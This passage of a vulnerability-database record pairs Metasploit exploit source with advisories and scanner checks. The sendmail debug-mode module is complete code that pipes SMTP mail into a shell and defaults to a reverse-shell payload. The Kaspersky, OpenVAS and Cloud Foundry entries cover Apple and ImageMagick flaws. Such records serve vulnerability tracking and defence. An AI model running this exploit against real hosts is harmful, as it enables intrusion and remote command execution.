Shut down any running services\n def cleanup\n super\n if self.service\n print_status(\"Shutting down payload stager listener...\")\n begin\n self.service.deref if self.service.is_a?(Rex::Service)\n if self.service.is_a?(Rex::Socket)\n self.service.close\n self.service.stop\n end\n self.service = nil\n rescue ::Exception\n end\n end\n end\n\n # Accessor for our TCP payload stager\n attr_accessor :service\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/misc/polycom_hdx_auth_bypass.rb"}, {"lastseen": "2019-11-27T21:14:00", "bulletinFamily": "exploit", "description": "This module exploits sendmail's well-known historical debug mode to escape to a shell and execute commands in the SMTP RCPT TO command. This vulnerability was exploited by the Morris worm in 1988-11-02. Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg. 
Currently only cmd/unix/reverse and cmd/unix/generic are supported.\n", "modified": "2018-11-16T18:18:28", "published": "2018-10-20T06:43:53", "id": "MSF:EXPLOIT/UNIX/SMTP/MORRIS_SENDMAIL_DEBUG", "href": "", "type": "metasploit", "title": "Morris Worm sendmail Debug Mode Shell Escape", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'expect'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n # cmd/unix/reverse spams the session with Telnet codes on EOF\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Morris Worm sendmail Debug Mode Shell Escape',\n 'Description' => %q{\n This module exploits sendmail's well-known historical debug mode to\n escape to a shell and execute commands in the SMTP RCPT TO command.\n\n This vulnerability was exploited by the Morris worm in 1988-11-02.\n Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n Currently only cmd/unix/reverse and cmd/unix/generic are supported.\n },\n 'Author' => [\n 'Robert Tappan Morris', # Exploit and worm for sure\n 'Cliff Stoll', # The Cuckoo's Egg inspiration\n 'wvu' # Module and additional research\n ],\n 'References' => [\n ['URL', 'https://en.wikipedia.org/wiki/Morris_worm'], # History\n ['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'], # Analysis\n ['URL', 'https://github.com/arialdomartini/morris-worm'], # Source\n ['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup\n ],\n 'DisclosureDate' => '1988-11-02',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => false, # DefUid in src/conf.c, usually \"daemon\"\n 'Payload' => {'Compat' => {'RequiredCmd' => 'generic telnet'}},\n 'Targets' => [\n # https://en.wikipedia.org/wiki/Source_Code_Control_System\n ['@(#)version.c 5.51 (Berkeley) 5/2/86', {}]\n ],\n 'DefaultTarget' 
=> 0,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'}\n ))\n\n register_options([Opt::RPORT(25)])\n\n register_advanced_options([\n OptFloat.new('SendExpectTimeout', [true, 'Timeout per send/expect', 3.5])\n ])\n end\n\n def check\n checkcode = CheckCode::Safe\n\n connect\n res = sock.get_once\n\n return CheckCode::Unknown unless res\n\n if res =~ /^220.*Sendmail/\n checkcode = CheckCode::Detected\n end\n\n sock.put(\"DEBUG\\r\\n\")\n res = sock.get_once\n\n return checkcode unless res\n\n if res.start_with?('200 Debug set')\n checkcode = CheckCode::Appears\n end\n\n checkcode\n rescue Rex::ConnectionError => e\n vprint_error(e.message)\n CheckCode::Unknown\n ensure\n disconnect\n end\n\n def exploit\n # We don't care who the user is, so randomize it\n from = rand_text_alphanumeric(8..42)\n\n # Strip mail header with sed(1), pass to sh(1), and ensure a clean exit\n to = %(\"| sed '1,/^$/d' | sh; exit 0\")\n\n # We don't have $PATH, so set one\n path = '/bin:/usr/bin:/usr/ucb:/etc'\n\n sploit = {\n nil => /220.*Sendmail/,\n 'DEBUG' => /200 Debug set/,\n \"MAIL FROM:<#{from}>\" => /250.*Sender ok/,\n \"RCPT TO:<#{to}>\" => /250.*Recipient ok/,\n 'DATA' => /354 Enter mail/,\n # Indent PATH= so it's not interpreted as part of the mail header\n \" PATH=#{path}\" => nil,\n 'export PATH' => nil,\n payload.encoded => nil,\n '.' 
=> /250 Ok/,\n 'QUIT' => /221.*closing connection/\n }\n\n print_status('Connecting to sendmail')\n connect\n\n print_status('Enabling debug mode and sending exploit')\n sploit.each do |line, pattern|\n Timeout.timeout(datastore['SendExpectTimeout']) do\n if line\n print_status(\"Sending: #{line}\")\n sock.put(\"#{line}\\r\\n\")\n end\n if pattern\n vprint_status(\"Expecting: #{pattern.inspect}\")\n sock.expect(pattern) do |pat|\n return unless pat\n vprint_good(\"Received: #{pat.first}\")\n end\n end\n end\n end\n rescue Rex::ConnectionError => e\n fail_with(Failure::Unreachable, e.message)\n rescue Timeout::Error\n fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')\n ensure\n disconnect\n end\n\n def on_new_session(session)\n print_warning(\"Do NOT type `exit', or else you may lose further shells!\")\n print_warning('Hit ^C to abort the session instead, please and thank you')\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/smtp/morris_sendmail_debug.rb"}], "kaspersky": [{"lastseen": "2019-03-21T00:15:07", "bulletinFamily": "info", "description": "### *Detect date*:\n02/11/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Apple iCloud. 
Malicious users can exploit these vulnerabilities to execute arbitrary code, perform cross-site scripting attack.\n\n### *Affected products*:\nApple iCloud earlier than 7.10\n\n### *Solution*:\nUpdate to the latest version \n[Download iCloud for Windows](<https://support.apple.com/en-us/HT204283>)\n\n### *Original advisories*:\n[About the security content of iCloud for Windows 7.10](<https://support.apple.com/en-us/HT209451>) \n\n\n### *Impacts*:\nACE \n\n### *CVE-IDS*:\n[CVE-2018-20346](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20346>)7.5Critical \n[CVE-2018-20505](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20505>)0.0Critical \n[CVE-2018-20506](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20506>)0.0Critical \n[CVE-2019-6215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6215>)0.0Critical \n[CVE-2019-6212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6212>)0.0Critical \n[CVE-2019-6216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6216>)0.0Critical \n[CVE-2019-6217](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6217>)0.0Critical \n[CVE-2019-6226](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6226>)0.0Critical \n[CVE-2019-6227](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6227>)0.0Critical \n[CVE-2019-6233](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6233>)0.0Critical \n[CVE-2019-6234](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6234>)0.0Critical \n[CVE-2019-6229](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6229>)0.0Critical", "modified": "2019-03-07T00:00:00", "published": "2019-02-11T00:00:00", "id": "KLA11409", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11409", "title": "\r KLA11409Multiple vulnerabilities in Apple iCloud ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-21T00:15:12", "bulletinFamily": "info", 
"description": "### *Detect date*:\n01/24/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Apple iTunes. Malicious users can exploit these vulnerabilities to bypass security restrictions, gain privileges, execute arbitrary code, and perform cross-site scripting attacks.\n\n### *Affected products*:\nApple iTunes earlier than 12.9.3\n\n### *Solution*:\nUpdate to the latest version \n[Download iTunes](<https://www.apple.com/itunes/download/>)\n\n### *Original advisories*:\n[About the security content of iTunes 12.9.3 for Windows](<https://support.apple.com/en-us/HT209450>) \n\n\n### *Impacts*:\nACE \n\n### *CVE-IDS*:\n[CVE-2019-6235](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6235>)7.5Critical \n[CVE-2019-6221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6221>)0.0Critical \n[CVE-2018-20346](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20346>)7.5Critical \n[CVE-2018-20505](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20505>)0.0Critical \n[CVE-2018-20506](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20506>)0.0Critical \n[CVE-2019-6215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6215>)0.0Critical \n[CVE-2019-6212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6212>)0.0Critical \n[CVE-2019-6216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6216>)0.0Critical \n[CVE-2019-6217](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6217>)0.0Critical \n[CVE-2019-6226](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6226>)0.0Critical \n[CVE-2019-6227](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6227>)0.0Critical \n[CVE-2019-6233](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6233>)0.0Critical \n[CVE-2019-6234](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6234>)0.0Critical \n[CVE-2019-6229](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6229>)0.0Critical", "modified": 
"2019-03-07T00:00:00", "published": "2019-01-24T00:00:00", "id": "KLA11408", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11408", "title": "KLA11408: Multiple vulnerabilities in Apple iTunes", "type": "kaspersky", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-05-29T18:32:05", "bulletinFamily": "scanner", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "modified": "2019-05-22T00:00:00", "published": "2019-01-25T00:00:00", "id": "OPENVAS:1361412562310814822", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814822", "title": "Apple iTunes Security Updates (HT209450)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Security Updates (HT209450)\n#\n# Authors:\n# Vidita V Koushik <vidita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2019 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814822\");\n script_version(\"2019-05-22T13:05:41+0000\");\n script_cve_id(\"CVE-2018-20346\", \"CVE-2018-20505\", \"CVE-2019-6212\", \"CVE-2019-6215\",\n \"CVE-2019-6216\", \"CVE-2019-6221\", \"CVE-2019-6227\", \"CVE-2019-6229\",\n \"CVE-2019-6233\", \"CVE-2018-20506\", \"CVE-2019-6217\", \"CVE-2019-6234\",\n \"CVE-2019-6235\", \"CVE-2019-6226\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 13:05:41 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-01-25 14:09:57 +0530 (Fri, 25 Jan 2019)\");\n script_name(\"Apple iTunes Security Updates (HT209450)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption issues.\n\n - An out-of-bounds read error.\n\n - A type confusion issue.\n\n - A logic issue.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to elevate\n privileges, conduct universal cross site scripting and execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.9.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.9.3 or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209450\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nappVer = infos['version'];\nappPath = infos['location'];\n\nif(version_is_less(version:appVer, test_version:\"12.9.3\"))\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"12.9.3\", install_path: appPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:04", "bulletinFamily": "scanner", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "modified": "2019-05-22T00:00:00", "published": "2019-01-23T00:00:00", "id": "OPENVAS:1361412562310814821", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814821", "title": "Apple iCloud Security Updates (HT209451)-Windows", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Security Updates (HT209451)-Windows\n#\n# Authors:\n# Vidita V Koushik <vidita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2019 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# 
This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814821\");\n script_version(\"2019-05-22T13:05:41+0000\");\n script_cve_id(\"CVE-2018-20346\", \"CVE-2018-20505\", \"CVE-2018-20506\", \"CVE-2019-6215\",\n \"CVE-2019-6212\", \"CVE-2019-6216\", \"CVE-2019-6217\", \"CVE-2019-6226\",\n \"CVE-2019-6227\", \"CVE-2019-6233\", \"CVE-2019-6234\", \"CVE-2019-6229\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 13:05:41 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-01-23 13:00:19 +0530 (Wed, 23 Jan 2019)\");\n script_name(\"Apple iCloud Security Updates (HT209451)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption issues exists in input validation and memory\n handling.\n\n - A type confusion issue and\n\n - A logic issue exists.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allows remote\n attackers to execute arbitrary code and conduct cross site scripting by\n processing maliciously crafted web 
content.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.10 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 7.10 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209451\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nicVer = infos['version'];\nicPath = infos['location'];\n\n# 7.10 => 7.10.0.9\nif(version_is_less(version:icVer, test_version:\"7.10.0.9\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"7.10\", install_path:icPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:24", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-10-05T00:00:00", "id": "OPENVAS:1361412562310843653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843653", "title": "Ubuntu Update for imagemagick USN-3785-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3785_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for imagemagick USN-3785-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free 
software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843653\");\n script_version(\"$Revision: 14288 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-05 08:17:46 +0200 (Fri, 05 Oct 2018)\");\n script_cve_id(\"CVE-2018-14434\", \"CVE-2018-14435\", \"CVE-2018-14436\", \"CVE-2018-14437\",\n \"CVE-2018-16640\", \"CVE-2018-16750\", \"CVE-2018-14551\", \"CVE-2018-16323\",\n \"CVE-2018-16642\", \"CVE-2018-16643\", \"CVE-2018-16644\", \"CVE-2018-16645\",\n \"CVE-2018-16749\", \"CVE-2017-13144\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for imagemagick USN-3785-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'imagemagick'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\npresent on the target host.\");\n script_tag(name:\"insight\", value:\"Due to a large number of issues discovered\nin GhostScript that prevent it from being used by ImageMagick safely, 
this update\nincludes a default policy change that disables support for the Postscript and\nPDF formats in ImageMagick. This policy can be overridden if necessary\nby using an alternate ImageMagick policy configuration.\n\nIt was discovered that several memory leaks existed when handling\ncertain images in ImageMagick. An attacker could use this to cause a\ndenial of service. (CVE-2018-14434, CVE-2018-14435, CVE-2018-14436,\nCVE-2018-14437, CVE-2018-16640, CVE-2018-16750)\n\nIt was discovered that ImageMagick did not properly initialize a\nvariable before using it when processing MAT images. An attacker could\nuse this to cause a denial of service or possibly execute arbitrary\ncode. This issue only affected Ubuntu 18.04 LTS. (CVE-2018-14551)\n\nIt was discovered that an information disclosure vulnerability existed\nin ImageMagick when processing XBM images. An attacker could use this\nto expose sensitive information. (CVE-2018-16323)\n\nIt was discovered that an out-of-bounds write vulnerability existed\nin ImageMagick when handling certain images. An attacker could use\nthis to cause a denial of service or possibly execute arbitrary code.\n(CVE-2018-16642)\n\nIt was discovered that ImageMagick did not properly check for errors\nin some situations. An attacker could use this to cause a denial of\nservice. (CVE-2018-16643)\n\nIt was discovered that ImageMagick did not properly validate image\nmeta data in some situations. An attacker could use this to cause a\ndenial of service. (CVE-2018-16644)\n\nIt was discovered that ImageMagick did not prevent excessive memory\nallocation when handling certain image types. An attacker could use\nthis to cause a denial of service. (CVE-2018-16645)\n\nSergej Schumilo and Cornelius Aschermann discovered that ImageMagick\ndid not properly check for NULL in some situations when processing\nPNG images. An attacker could use this to cause a denial of service.\n(CVE-2018-16749)\n\nUSN-3681-1 fixed vulnerabilities in Imagemagick. 
Unfortunately,\nthe fix for CVE-2017-13144 introduced a regression in ImageMagick in\nUbuntu 14.04 LTS and Ubuntu 16.04 LTS. This update reverts the fix\nfor CVE-2017-13144 for those releases.\n\nWe apologize for the inconvenience.\");\n script_tag(name:\"affected\", value:\"imagemagick on Ubuntu 18.04 LTS,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3785-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3785-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|18\\.04 LTS|16\\.04 LTS)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.7.7.10-6ubuntu3.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagick++5\", ver:\"8:6.7.7.10-6ubuntu3.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore5\", ver:\"8:6.7.7.10-6ubuntu3.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore5-extra\", ver:\"8:6.7.7.10-6ubuntu3.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"imagemagick\", 
ver:\"8:6.9.7.4+dfsg-16ubuntu6.4\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.9.7.4+dfsg-16ubuntu6.4\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-7\", ver:\"8:6.9.7.4+dfsg-16ubuntu6.4\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-3\", ver:\"8:6.9.7.4+dfsg-16ubuntu6.4\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-3-extra\", ver:\"8:6.9.7.4+dfsg-16ubuntu6.4\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.8.9.9-7ubuntu5.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.8.9.9-7ubuntu5.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5v5\", ver:\"8:6.8.9.9-7ubuntu5.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2\", ver:\"8:6.8.9.9-7ubuntu5.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra\", ver:\"8:6.8.9.9-7ubuntu5.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:52", "bulletinFamily": "software", "description": "# \n\n# 
Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n * Canonical Ubuntu 18.04\n\n# Description\n\nDue to a large number of issues discovered in GhostScript that prevent it from being used by ImageMagick safely, this update includes a default policy change that disables support for the Postscript and PDF formats in ImageMagick. This policy can be overridden if necessary by using an alternate ImageMagick policy configuration.\n\nIt was discovered that several memory leaks existed when handling certain images in ImageMagick. An attacker could use this to cause a denial of service. (CVE-2018-14434, CVE-2018-14435, CVE-2018-14436, CVE-2018-14437, CVE-2018-16640, CVE-2018-16750)\n\nIt was discovered that ImageMagick did not properly initialize a variable before using it when processing MAT images. An attacker could use this to cause a denial of service or possibly execute arbitrary code. This issue only affected Ubuntu 18.04 LTS. (CVE-2018-14551)\n\nIt was discovered that an information disclosure vulnerability existed in ImageMagick when processing XBM images. An attacker could use this to expose sensitive information. (CVE-2018-16323)\n\nIt was discovered that an out-of-bounds write vulnerability existed in ImageMagick when handling certain images. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2018-16642)\n\nIt was discovered that ImageMagick did not properly check for errors in some situations. An attacker could use this to cause a denial of service. (CVE-2018-16643)\n\nIt was discovered that ImageMagick did not properly validate image meta data in some situations. An attacker could use this to cause a denial of service. (CVE-2018-16644)\n\nIt was discovered that ImageMagick did not prevent excessive memory allocation when handling certain image types. An attacker could use this to cause a denial of service. 
(CVE-2018-16645)\n\nSergej Schumilo and Cornelius Aschermann discovered that ImageMagick did not properly check for NULL in some situations when processing PNG images. An attacker could use this to cause a denial of service. (CVE-2018-16749)\n\nUSN-3681-1 fixed vulnerabilities in Imagemagick. Unfortunately, the fix for CVE-2017-13144 introduced a regression in ImageMagick in Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. This update reverts the fix for CVE-2017-13144 for those releases.\n\nWe apologize for the inconvenience.\n\nCVEs contained in this USN include: CVE-2018-14434, CVE-2018-14435, CVE-2018-14436, CVE-2018-14437, CVE-2018-14551, CVE-2018-16323, CVE-2018-16640, CVE-2018-16642, CVE-2018-16643, CVE-2018-16644, CVE-2018-16645, CVE-2018-16749, CVE-2018-16750\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * All versions of Cloud Foundry cflinuxfs2 prior to 1.240.0\n * All versions of Cloud Foundry cflinuxfs3 prior to 0.28.0\n\n# Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 version 1.240.0 or later.\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with 